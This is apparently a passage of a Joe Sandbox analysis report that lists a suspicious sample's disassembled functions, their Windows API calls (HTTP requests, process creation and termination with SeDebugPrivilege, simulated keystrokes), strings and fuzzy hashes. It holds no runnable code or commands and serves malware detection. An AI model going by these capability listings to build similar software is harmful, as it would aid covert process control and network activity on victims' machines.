Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: a8a63c279dc4f8ed0233d0969ccdb2b48c3f55a500bc5831344eee6765c9eae0
Instruction ID: 16e33d7dd518cf0a658f80837e40b28f82646f473a5feb28a53099d61bcedd73
Opcode Fuzzy Hash: a8a63c279dc4f8ed0233d0969ccdb2b48c3f55a500bc5831344eee6765c9eae0
Instruction Fuzzy Hash: 2C91B830500516AADB48EFE0C492BEEFB77BF04305F54821DEC5AA7281DB316A9DCB95

Function 00602E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00602EAE

Part of subcall function 00601DB3: GetClientRect.USER32(?,?), ref: 00601DDC
Part of subcall function 00601DB3: GetWindowRect.USER32(?,?), ref: 00601E1D
Part of subcall function 00601DB3: ScreenToClient.USER32(?,?), ref: 00601E45

GetDC.USER32 ref: 0063CD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0063CD45
SelectObject.GDI32(00000000,00000000), ref: 0063CD53
SelectObject.GDI32(00000000,00000000), ref: 0063CD68
ReleaseDC.USER32(?,00000000), ref: 0063CD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0063CDFB

Strings

U, xrefs: 0063CCD0

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 734ff5850530eabe2ea82128daca0be2b05e9c4524b85a5b47176065c17aa5dd
Instruction ID: c7363e2997e4f7caaca5b0418c136cdbe515b154cea2f590566a38d541c54cd6
Opcode Fuzzy Hash: 734ff5850530eabe2ea82128daca0be2b05e9c4524b85a5b47176065c17aa5dd
Instruction Fuzzy Hash: C471BF31500205EFCF259F64CC94AEA7BB7FF48320F14426AFD55AA2A6D7319891DBA0

Function 00671A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00671A50
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00671A7C
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00671ABE
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00671AD3
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00671AE0
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00671B10
InternetCloseHandle.WININET(00000000), ref: 00671B57

Part of subcall function 00672483: GetLastError.KERNEL32(?,?,00671817,00000000,00000000,00000001), ref: 00672498
Part of subcall function 00672483: SetEvent.KERNEL32(?,?,00671817,00000000,00000000,00000001), ref: 006724AD

Strings

, xrefs: 00671B01

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: 383a9686fb84e6c8b805da7676e13b89c95b81ccaccd76eb48927196db209cc5
Instruction ID: 10409e599232d33cf1608caa6ba316e519eb81c595a6c59be3e722a5b5856f18
Opcode Fuzzy Hash: 383a9686fb84e6c8b805da7676e13b89c95b81ccaccd76eb48927196db209cc5
Instruction Fuzzy Hash: 714192B1501219BFEB118F64CC85FFB77AEEF09750F10812AFD099A241E7749E418BA4

Function 00678C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0068F910), ref: 00678D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0068F910), ref: 00678D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00678ED6
SysFreeString.OLEAUT32(?), ref: 00678F00

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: e6a3f77a57a834b402f46eeb7595f047b1f0a459c7650115dae7988e77558648
Instruction ID: c8217fccada996d486f82b372be768dcdc8c4ec394528cd93883b26089f3a782
Opcode Fuzzy Hash: e6a3f77a57a834b402f46eeb7595f047b1f0a459c7650115dae7988e77558648
Instruction Fuzzy Hash: BDF10971A00109EFDB14DF94C888EEEB7BAFF45315F108558F909AB251DB31AE46CB61

Function 0067F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0067F6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0067F848
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0067F86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0067F8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0067F8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0067FA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0067FA7C
CloseHandle.KERNEL32(?), ref: 0067FAAB
CloseHandle.KERNEL32(?), ref: 0067FB22

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 8339f0513b88726131dc313d1538b53cfe5ac3938127298a21e3861956e154f7
Instruction ID: 54db958b029d64afced5ae248fe895634bf4f1a326afcdb21c319ac20d624827
Opcode Fuzzy Hash: 8339f0513b88726131dc313d1538b53cfe5ac3938127298a21e3861956e154f7
Instruction Fuzzy Hash: D5E1BD71204201AFC754EF24D891FAABBE2AF85314F14896DF8899B3A2CB31DC41CB56

Function 00664CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0066466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00663697,?), ref: 0066468B

Part of subcall function 0066466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00663697,?), ref: 006646A4

Part of subcall function 00664A31: GetFileAttributesW.KERNEL32(?,0066370B), ref: 00664A32

lstrcmpiW.KERNEL32(?,?), ref: 00664D40
_wcscmp.LIBCMT ref: 00664D5A
MoveFileW.KERNEL32(?,?), ref: 00664D75

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: f0f532b1ef0f4a7e63acd571b8fd3e518921c81b4faff84ecbb1b84f2558ab3b
Instruction ID: eca15be45c4abae408b900ae0031932b3341ea2bc61df2bbe6347b69e7386a75
Opcode Fuzzy Hash: f0f532b1ef0f4a7e63acd571b8fd3e518921c81b4faff84ecbb1b84f2558ab3b
Instruction Fuzzy Hash: D75168B2408385ABC765DB90D8819DFB3EDAF85350F00092EF685D3151EF35A589CB5A

Function 00688645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 006886FF

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 7baa8ca60665fe3943db87b7a52bd611d04463217bde0db58a9ed40c4750774c
Instruction ID: abdd5f1ed944ad2cb4f6c658dc696fc0c30ae0c503e831dedf1fa1002cf8349d
Opcode Fuzzy Hash: 7baa8ca60665fe3943db87b7a52bd611d04463217bde0db58a9ed40c4750774c
Instruction Fuzzy Hash: BB518170540254BEEB24AB24CC89FAD7BA7EF05720FA04315FA51E72E1DF71A980CB55

Function 00602B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0063C2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0063C319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0063C331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0063C34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0063C370
DestroyIcon.USER32(00000000), ref: 0063C37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0063C39C
DestroyIcon.USER32(?), ref: 0063C3AB

Part of subcall function 0068A4AF: DeleteObject.GDI32(00000000), ref: 0068A4E8

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: af6189205b69cf1e7f1d58dce17a3645728b62bec7b39b68732924ad379ebea9
Instruction ID: 1d4b1112bd27ce1b353a07e7b0b4a28189efea86e91a936e1a376cc4e703f649
Opcode Fuzzy Hash: af6189205b69cf1e7f1d58dce17a3645728b62bec7b39b68732924ad379ebea9
Instruction Fuzzy Hash: 3E514B70A40206AFEB24DF64CC55FAB7BA6EF54320F104629F912A72D0D770ED91DB90

Function 0065966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0065A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0065A84C
Part of subcall function 0065A82C: GetCurrentThreadId.KERNEL32 ref: 0065A853
Part of subcall function 0065A82C: AttachThreadInput.USER32(00000000,?,00659683,?,00000001), ref: 0065A85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 0065968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 006596AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 006596AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 006596B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 006596D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 006596D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 006596E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 006596F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 006596FB

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: c27469f3513b12bfdbd73e2155843c883f4592915e745a56b906c17f92d149d4
Instruction ID: 077fea6965d62ce1c42bb662a1854e5b07c47f97b2071423a2b589ee79330eeb
Opcode Fuzzy Hash: c27469f3513b12bfdbd73e2155843c883f4592915e745a56b906c17f92d149d4
Instruction Fuzzy Hash: 7511E1B1A50218BEF7106F60DC89F6A3B2EEB4C751F101629F644AB0A0C9F25C50DBA8

Function 00658921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0065853C,00000B00,?,?), ref: 0065892A
HeapAlloc.KERNEL32(00000000,?,0065853C,00000B00,?,?), ref: 00658931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0065853C,00000B00,?,?), ref: 00658946
GetCurrentProcess.KERNEL32(?,00000000,?,0065853C,00000B00,?,?), ref: 0065894E
DuplicateHandle.KERNEL32(00000000,?,0065853C,00000B00,?,?), ref: 00658951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0065853C,00000B00,?,?), ref: 00658961
GetCurrentProcess.KERNEL32(0065853C,00000000,?,0065853C,00000B00,?,?), ref: 00658969
DuplicateHandle.KERNEL32(00000000,?,0065853C,00000B00,?,?), ref: 0065896C
CreateThread.KERNEL32(00000000,00000000,00658992,00000000,00000000,00000000), ref: 00658986

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: eaf532770a16531f9294607d09ef6c62c224f2da21439567494f721b78f3ca0a
Instruction ID: 313db503978707e343fe07ce0a4ae43f3fc4acc9febbd71605772b4cda3f0d01
Opcode Fuzzy Hash: eaf532770a16531f9294607d09ef6c62c224f2da21439567494f721b78f3ca0a
Instruction Fuzzy Hash: 7C01B6B5240308FFE710ABA5DC8DF6B7BADEB89711F419521FA05DB2A1CA749810CB20

Function 00679B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00679BA4, 00679EC8
Not an Object type, xrefs: 00679B7B

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 2ffc7ca92c6899955bfaa4c8a4f00dcf78ea9bb9bdc485d077dad49f06478e51
Instruction ID: 8fb37c46222f14d7dd8244a1dc00361b7e8b83ce23e704235f94b93cbc344e9d
Opcode Fuzzy Hash: 2ffc7ca92c6899955bfaa4c8a4f00dcf78ea9bb9bdc485d077dad49f06478e51
Instruction Fuzzy Hash: 84C1A371A0021A9FDF14DFA8D884AEEB7F6FF48314F148569E909A7381E7709D45CBA0

Function 0067975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 0065710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00657044,80070057,?,?,?,00657455), ref: 00657127
Part of subcall function 0065710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00657044,80070057,?,?), ref: 00657142
Part of subcall function 0065710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00657044,80070057,?,?), ref: 00657150
Part of subcall function 0065710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00657044,80070057,?), ref: 00657160

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00679806
_memset.LIBCMT ref: 00679813
_memset.LIBCMT ref: 00679956
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00679982
CoTaskMemFree.OLE32(?), ref: 0067998D

Strings

NULL Pointer assignment, xrefs: 006799DB

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 658528ecbc4288f24a384036068b611770c991c3a160695b629fccbee0e69600
Instruction ID: 9161dc0b8222f7b42cdcda388b83c950f004c9ebf250a8d6415be80ce5ae937f
Opcode Fuzzy Hash: 658528ecbc4288f24a384036068b611770c991c3a160695b629fccbee0e69600
Instruction Fuzzy Hash: 3B911A71D00229EBDB14DFA5DC45EDEBBBAAF08310F10815AF519A7291EB715A44CFA0

Function 00686D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00686E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 00686E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00686E52
_wcscat.LIBCMT ref: 00686EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 00686EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00686EF2

Strings

SysListView32, xrefs: 00686DF6

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: fa92b7fa6f0bcb7e6f70ef296bdfb9a958196be5b11dd5f647319819aea4e4f9
Instruction ID: c189a7ac14bb04b1e9746d3e66087ae831aa55c42fc367df35ff6312aac9df28
Opcode Fuzzy Hash: fa92b7fa6f0bcb7e6f70ef296bdfb9a958196be5b11dd5f647319819aea4e4f9
Instruction Fuzzy Hash: 7141B270A40308ABDB21EF64CC89BEE77EAEF08350F10062AF585E7291D6719D848B60

Function 0067E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00663C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00663C7A
Part of subcall function 00663C55: Process32FirstW.KERNEL32(00000000,?), ref: 00663C88
Part of subcall function 00663C55: CloseHandle.KERNEL32(00000000), ref: 00663D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0067E9A4
GetLastError.KERNEL32 ref: 0067E9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0067E9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 0067EA63
GetLastError.KERNEL32(00000000), ref: 0067EA6E
CloseHandle.KERNEL32(00000000), ref: 0067EAA3

Strings

SeDebugPrivilege, xrefs: 0067E9C2

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 2497b957456e88143891e766fa8ca548d06e228eed337db4d8efae7c7c917870
Instruction ID: b0b65319215a93b2686d16ab734d3d83deaafc75044364082726ce7dc4100d98
Opcode Fuzzy Hash: 2497b957456e88143891e766fa8ca548d06e228eed337db4d8efae7c7c917870
Instruction Fuzzy Hash: 0B4198716402019FDB14EF24CC95BAEB7A7AF54314F08895CF9469B3C2DB72A848CB99

Function 00662F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00663033

Strings

warning, xrefs: 0066301C
blank, xrefs: 00662FB5
question, xrefs: 00662FEC
stop, xrefs: 00663004
info, xrefs: 00662FD4

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: f346b56536549639791c708197a9e18055a3fc1a0ee8922eaa3d0a4bd24f7282
Instruction ID: a428cc02608aa43235a3ceaef4322b0fedd630afdfe190d7e4146ce272bb1c91
Opcode Fuzzy Hash: f346b56536549639791c708197a9e18055a3fc1a0ee8922eaa3d0a4bd24f7282
Instruction Fuzzy Hash: 6B11D832648757BEE7259B54EC42CEF679E9F15360B20002AF90067382DB715F4557A4

Function 006642F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00664312
LoadStringW.USER32(00000000), ref: 00664319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0066432F
LoadStringW.USER32(00000000), ref: 00664336
_wprintf.LIBCMT ref: 0066435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0066437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00664357

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
